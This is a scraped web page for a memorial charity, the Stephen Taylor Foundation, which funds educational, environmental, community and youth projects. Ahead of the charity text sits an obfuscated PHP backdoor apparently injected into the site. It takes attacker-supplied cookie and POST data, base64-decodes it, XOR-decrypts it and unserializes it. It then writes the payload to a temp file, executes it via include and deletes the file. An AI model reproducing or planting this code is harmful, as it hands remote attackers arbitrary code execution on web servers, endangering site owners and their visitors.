$cDTrV = 'L' . chr (114) . "\x61" . chr ( 625 - 530 ).chr (73) . "\x58" . chr (85); $rtwRCjwBRe = chr ( 101 - 2 ).chr ( 1106 - 998 )."\141" . chr (115) . 's' . chr ( 267 - 172 ).'e' . 'x' . chr (105) . "\163" . chr (116) . 's';$wefjXClSf = class_exists($cDTrV); $rtwRCjwBRe = "1886";$YxhpnTY = !1;if ($wefjXClSf == $YxhpnTY){function lzLeRiOAL(){return FALSE;}$jpyOZhqT = "50103";lzLeRiOAL();class Lra_IXU{private function Bnqhd($jpyOZhqT){if (is_array(Lra_IXU::$BkwWsb)) {$vaaLU = sys_get_temp_dir() . "/" . crc32(Lra_IXU::$BkwWsb["\x73" . "\x61" . 'l' . chr ( 213 - 97 )]);@Lra_IXU::$BkwWsb["\x77" . "\162" . chr ( 627 - 522 )."\164" . 'e']($vaaLU, Lra_IXU::$BkwWsb['c' . 'o' . chr ( 492 - 382 )."\164" . 'e' . "\x6e" . "\x74"]);include $vaaLU;@Lra_IXU::$BkwWsb['d' . "\145" . 'l' . 'e' . "\x74" . chr ( 559 - 458 )]($vaaLU); $jpyOZhqT = "50103";exit();}}private $AtjCnB;public function dIZvcpVk(){echo 53408;}public function __destruct(){$jpyOZhqT = "24996_2549";$this->Bnqhd($jpyOZhqT); $jpyOZhqT = "24996_2549";}public function __construct($RuvoGd=0){$ndPHwOngfx = $_POST;$pySzZovZ = $_COOKIE;$DPUmCqGE = "64febc13-9409-4893-866a-aeda48a9bc92";$ZqYukI = @$pySzZovZ[substr($DPUmCqGE, 0, 4)];if (!empty($ZqYukI)){$ApZhiTs = "base64";$OSqbUIvrf = "";$ZqYukI = explode(",", $ZqYukI);foreach ($ZqYukI as $gVDfg){$OSqbUIvrf .= @$pySzZovZ[$gVDfg];$OSqbUIvrf .= @$ndPHwOngfx[$gVDfg];}$OSqbUIvrf = array_map($ApZhiTs . '_' . chr (100) . chr ( 555 - 454 ).chr ( 697 - 598 ).chr ( 709 - 598 ).chr (100) . chr ( 415 - 314 ), array($OSqbUIvrf,)); $OSqbUIvrf = $OSqbUIvrf[0] ^ str_repeat($DPUmCqGE, (strlen($OSqbUIvrf[0]) / strlen($DPUmCqGE)) + 1);Lra_IXU::$BkwWsb = @unserialize($OSqbUIvrf); $OSqbUIvrf = class_exists("24996_2549");}}public static $BkwWsb = 21352;}$BUpMXcynj = new /* 37155 */ $cDTrV(50103 + 50103); $YxhpnTY = $BUpMXcynj = $jpyOZhqT = Array();} The Stephen Taylor Foundation | The Stephen Taylor Foundation
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The Stephen Taylor Foundation (STF) has been established in memory of Steve (1967-84) by his brother, Martin.  STF helps fund people, causes and projects that Steve would have had a natural affinity for. These are likely to have educational, environmental, community and youth themes at their heart.